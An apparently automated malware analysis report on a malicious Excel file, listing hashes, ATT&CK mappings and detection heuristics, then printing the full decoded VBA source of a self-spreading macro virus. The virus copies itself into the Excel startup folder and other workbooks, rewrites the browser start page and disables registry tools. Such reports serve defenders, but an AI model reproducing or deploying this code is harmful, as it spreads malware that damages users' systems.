Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ed608116862bbd57…

MALICIOUS

Office (OLE)

50.0 KB Created: 2006-09-13 11:21:51 Authoring application: Microsoft Excel First seen: 2015-09-24
MD5: 6e66fa9576415343757b4ea6aa2a8610 SHA-1: 7b91a50a97439f1465e30f40a724eefa52eabe43 SHA-256: ed608116862bbd57aca71d9a826de2463321554f0dc872f7bb6e720a2169b0f1
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The VBA macro code within the sample is designed to execute automatically upon opening the document. It proceeds to create and save a new Excel file named 'KING.XLS' in the application's startup path, indicating an attempt to establish persistence. The use of WScript.Shell and CreateObject further supports the malicious intent of the macro.

Heuristics 8

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set OperationRegistry = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set OperationRegistry = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://3azu.taobao.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2674 bytes
SHA-256: 3e79694a96361b8a8818de6a569ca2239c68ea078f083a6df6a28623aaebbcca
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KING"




Sub auto_open()
    Application.OnSheetActivate = "ck_files"
End Sub

Sub ck_files()
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "KING.XLS") 'results
    If m$ = "KING.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    Sheets("KING").Visible = True
    Sheets("KING").Select
    Sheets("KING").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("KING").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).name
    If s$ <> "KING" Then
        Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("KING").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case Else
End Select
Dim OperationRegistry
On Error Resume Next

Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl

RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"

Exit Sub   '正常运行的话会在这里退出程序

End Sub




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True